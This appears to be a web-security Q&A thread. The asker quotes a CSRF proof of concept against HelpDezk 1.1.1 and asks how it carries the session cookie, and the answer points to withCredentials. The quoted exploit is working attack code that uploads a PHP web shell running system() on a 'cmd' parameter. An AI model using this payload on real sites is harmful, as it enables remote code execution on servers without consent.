CODEWITHSUNDEEP
htmlhttpcookiescsrf
anon
anon

Reputation: 463

CSRF exploit and cookie

In the definition of CSRF we have

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated.

That means it applies on the authenticated user, that already has a valid cookie for login to user panel. But in every csrf exploit that I've ever see there is no cookie part or something related; For example this csrf exploit:

<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload2", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1883328331133778598415248998");
        xhr.withCredentials = true;
        var body = "-----------------------------1883328331133778598415248998\r\n" + 
          "Content-Disposition: form-data; name=\"file\"; filename=\"index.php\"\r\n" + 
          "Content-Type: text/php\r\n" + 
          "\r\n" + 
          "\x3c?php\n" + 
          "\n" + 
          "if(isset($_REQUEST[\'cmd\'])){\n" + 
          "        echo \"\x3cpre\x3e\";\n" + 
          "        $cmd = ($_REQUEST[\'cmd\']);\n" + 
          "        system($cmd);\n" + 
          "        echo \"\x3c/pre\x3e\";\n" + 
          "        die;\n" + 
          "}\n" + 
          "\n" + 
          "?\x3e\r\n" + 
          "-----------------------------1883328331133778598415248998--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

The exploit uses ajax to make a post request, but as we know it needs to set a cookie too. I know that it exec on user's side but this request doesn't call any cookie from browser storage. How can it be possible? Thanks

Upvotes: 0

Views: 459

Answers (1)

Quentin
Quentin

Reputation: 943097

the exploit uses ajax to make a post request, but as we know it needs to set a cookie too

It doesn't, and can't.

but this request doesn't call any cookie from browser storage

You're wrong. It does. Look at this:

xhr.withCredentials = true;

and the docs:

The XMLHttpRequest.withCredentials property is a Boolean that indicates whether or not cross-site Access-Control requests should be made using credentials such as cookies, authorization headers or TLS client certificates. Setting withCredentials has no effect on same-site requests.

Upvotes: 1

Related Questions